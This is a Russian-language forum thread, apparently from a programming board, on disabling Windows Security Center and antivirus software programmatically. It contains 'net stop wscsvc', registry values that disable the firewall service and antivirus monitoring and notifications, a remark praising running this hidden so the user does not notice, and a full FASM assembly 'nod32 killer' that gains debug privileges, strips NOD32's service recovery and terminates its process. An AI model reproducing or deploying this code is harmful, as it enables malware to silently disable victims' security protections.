Деактивация "центр безопасности Windows"

Всем известен "центр безопасности" и когда отключается антивирус или FireWall в трее появляется сообщение, что произошло отключение и висит красный щиток Вот может кто сталкивался с тем как отключить этот центр безопасности... Где что поменять

 

Останови сервис "Центр обеспечения безопасности" и всё.

 

кликни по этому значку, там откроется окно, слева должны быть разные ссылки и среди них есть настройки...вот там и вырубай (говорю по памяти, поскольку давно переустанавливал винду, уже точно и не помню...)

///groundhog: гениально, и как он сам не додумался?

 

Ребята я имею ввиду программно -> останавливать сервис (как советует groundhog) как его вычислить? или можно в реестре изменить чего-нибуд

 

net stop wscsvc
или программно убей Security Center. Смотри сорцы класса ServiceManager (http://www.codeproject.com/useritems/ServiceManager.asp)

 

MstDoc Читай пост №4

Deem3n® Гениально!!! Запустить скрыто командную строку и передать ей "net stop wscsvc" и пользователь не замет что слетел антивирь
Deem3n® Респектище, лучше и не придумаешь!!!

 

Видимо программно останавливать сервис мы не умеем?
OpenSCManagerA, OpenServiceA, ControlService

 

_Great_ Да я пока не учился
командную строку и передать ей "net stop wscsvc" - в одну WinAPi
OpenSCManagerA, OpenServiceA, ControlService - Три вызова!

// А так, _Great_ спасибо за подсказку, попрактикуюсь с сервисами

 

Пример работы с Нодом:

Code:

; --------------------------------------------------------------------------------------
; nod32 killer
; Created by Ct757
; --------------------------------------------------------------------------------------

format PE GUI 4.0
entry start

  include '%fasminc%\win32a.inc'

section '.main' code readable writeable executable

	 SC_MANAGER_ALL_ACCESS		      = 0x000F003F
	 SERVICE_ALL_ACCESS		      = 0x000F01FF

	 SERVICE_CONFIG_FAILURE_ACTIONS       = 2
	 SERVICE_CONTROL_STATUS_REASON_INFO   = 1

;         szNODService           db 'SYSTEM\CurrentControlSet\Services\NOD32krn',0
;         szFailureActions       db 'FailureActions',0

	 szNODExeFile		db 'nod32krn.exe',0
	 szSeDebugPrivilege	db 'SeDebugPrivilege',0

	 szNODSvcName		db 'NOD32krn',0

;         hKey                   dd ?

	 hSCM			dd ?
	 hSvc			dd ?

	 hSnap			dd ?
	 hToken 		dd ?
	 ReturnLength		dd ?

  align 0x10

	 tkp:					   ; struct TOKEN_PRIVILEGES
	   .PrivilegeCount	dd ?
	   .LowPart		dd ?
	   .HighPart		dd ?
	   .Attributes		dd ?

	 PrivLUID:				   ; struct LUID
	   .LowPart		dd ?
	   .HighPart		dd ?

	 sfa:					   ; struct SERVICE_FAILURE_ACTIONS
	   .dwResetPeriod	dd -1
	   .lpRebootMsg 	dd 0
	   .lpCommand		dd 0
	   .cActions		dd 3
	   .lpsaActions 	dd act

	 act			db (2*4*3) dup (0) ; array of 3 SC_ACTION structs


	 p_ent: 				   ; struct PROCESSENTRY32
	   .dwSize		dd p_ent_size
	   .cntUsage		dd ?
	   .th32ProcessID	dd ?
	   .th32DefaultHeapID	dd ?
	   .th32ModuleID	dd ?
	   .cntThreads		dd ?
	   .th32ParentProcessID dd ?
	   .pcPriClassBase	dd ?
	   .dwFlags		dd ?
	   .szExeFile		db 260 dup(?)
	 p_ent_size = $ - p_ent

  start:

; --------------------------------------------------------------------------------------
; Получение отладочных привилегий:

	 invoke    OpenProcessToken,-1,0x0028,hToken

	 invoke    LookupPrivilegeValue,0,szSeDebugPrivilege,PrivLUID
	 test	   eax,eax
	 je	   close_token

	 push	   [PrivLUID.LowPart]
	 pop	   [tkp.LowPart]
	 push	   [PrivLUID.HighPart]
	 pop	   [tkp.HighPart]
	 mov	   [tkp.Attributes],2	    ; SE_PRIVILEGE_ENABLED
	 mov	   [tkp.PrivilegeCount],1

	 invoke    AdjustTokenPrivileges,[hToken],FALSE,tkp,0x10,tkp,ReturnLength

  close_token:
	 invoke    CloseHandle,[hToken]

; --------------------------------------------------------------------------------------

; --------------------------------------------------------------------------------------
; Отключение восстановления сервиса через SCM:

	 invoke    OpenSCManager,0,0,SC_MANAGER_ALL_ACCESS
	 test	   eax,eax
	 je	   exit

	 mov	   [hSCM],eax

	 invoke    OpenService,eax,szNODSvcName,SERVICE_ALL_ACCESS
	 test	   eax,eax
	 je	   close_scm

	 mov	   [hSvc],eax

	 invoke    ChangeServiceConfig2,eax,SERVICE_CONFIG_FAILURE_ACTIONS,sfa

	 invoke    CloseServiceHandle,[hSvc]

  close_scm:
	 invoke    CloseServiceHandle,[hSCM]

; --------------------------------------------------------------------------------------

; --------------------------------------------------------------------------------------
; Вариант отключения восстановления напрямую через реестр:
;
;         invoke    RegOpenKeyEx,HKEY_LOCAL_MACHINE,szNODService,0,KEY_SET_VALUE,hKey
;         test      eax,eax
;         jne       exit
;
;         invoke    RegDeleteValue,[hKey],szFailureActions
;
;         invoke    RegCloseKey,[hKey]
;
; --------------------------------------------------------------------------------------

; --------------------------------------------------------------------------------------
; Поиск и завершение процесса:

  find_nod32_pid:
	 invoke    CreateToolhelp32Snapshot,2,0
	 inc	   eax
	 je	   exit
	 dec	   eax

	 mov	   [hSnap],eax

	 invoke    Process32First,eax,p_ent
	 test	   eax,eax
	 je	   close_snap

  check_process:
	 invoke    lstrcmpi,p_ent.szExeFile,szNODExeFile
	 test	   eax,eax
	 jne	   next_process

	 invoke    OpenProcess,PROCESS_TERMINATE,FALSE,[p_ent.th32ProcessID]
	 test	   eax,eax
	 je	   next_process
	 xchg	   eax,ebx

	 invoke    TerminateProcess,ebx,0

	 invoke    CloseHandle,ebx

  next_process:
	 invoke    Process32Next,[hSnap],p_ent
	 test	   eax,eax
	 jne	   check_process

  close_snap:
	 invoke    CloseHandle,[hSnap]

; --------------------------------------------------------------------------------------

  exit:
	 invoke    ExitProcess,0

section '.idata' import data readable writeable

  library kernel32, 'KERNEL32.DLL',\
	  user32, 'USER32.DLL',\
	  advapi32, 'ADVAPI32.DLL'

  include '%fasminc%\APIA\kernel32.inc'
  include '%fasminc%\APIA\user32.inc'
  include '%fasminc%\APIA\advapi32.inc'

 

мля ты сама поняла что выложила? нод можно убить только если у юзера имеються права админа... в любом другом случае он начнет восстанавливаться - проверено на последней сборке... там несколько ядер... имон... амон и резидентная защита...

 

Отключить «Центр безопасности»
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc
Параметр «Start»:dword присвойте ему значение «4», чтобы отключить запуск «Центра безопасности» и не выводить его значок в «Области уведомлений» (системном трее) «Панели задач».

Отменить мониторинг наличия антивирусного программного обеспечения
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Параметр «AntiVirusOverride»:dword присвойте ему значение «1», чтобы отключить отслеживание наличия антивирусного программного обеспечения.

Отменить мониторинг сети при помощи встроенного файрволла
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Параметр «FirewallOverride»:dword присвойте ему значение «1», чтобы не следить за сетью при помощи встроенного файрволла «Windows».

Отключить уведомления встроенного файрволла
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Параметр «FirewallDisableNotify»:dword присвойте ему значение «1», чтобы отключить уведомления встроенного файрволла «Windows», выводимые в «Области уведомлений» (системном трее) «Панели задач».

Отключить службу встроенного файрволла
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess
Параметр «Start»:dword присвойте ему значение «4», чтобы отключить службу (сервис) встроенного файрволла «Windows».

Отключить уведомления слежения за антивирусным обеспечением
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Параметр «AntiVirusDisableNotify»:dword присвойте ему значение «1», чтобы отключить уведомления слежения за антивирусным обеспечением, выводимые в «Области уведомлений» (системном трее) «Панели задач».

Отключить уведомления службы «Автоматического обновления»
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Параметр «UpdatesDisableNotify» :dword присвойте ему значение «1», чтобы отключить уведомления службы «Автоматического обновления», выводимые в «Области уведомлений» (системном трее) «Панели задач».

(с) Te0s @ bogdanovich.ru

или попробуй так:

Создать reg файл следующего содержания: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center] "AntiVirusDisableNotify"=dword:00000001 "FirewallDisableNotify"=dword:00000001 "UpdatesDisableNotify"=dword:00000001 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center] "AntiVirusOverride"=dword:00000001 "FirewallOverride"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc] "Start"=dword:00000004 -

 

Y.Dmitriy Пофик, главное попрактиковаться А попрактиковаться и на старых версия можно!

Elvis000 А как же быть с проактивной защитой к примеру каспера

 

Жми разрешить, либо приостанови защиту. А вообще конкретнее надо вопросы задавать.

Попробуй посмотри здесь, возможно поможет: /threadnav42447-1-10.html

 

Обсуждалось много раз, поищи на васме информацию.

Угу, самый хакерский способ - это жать на кнопочки, уважуха.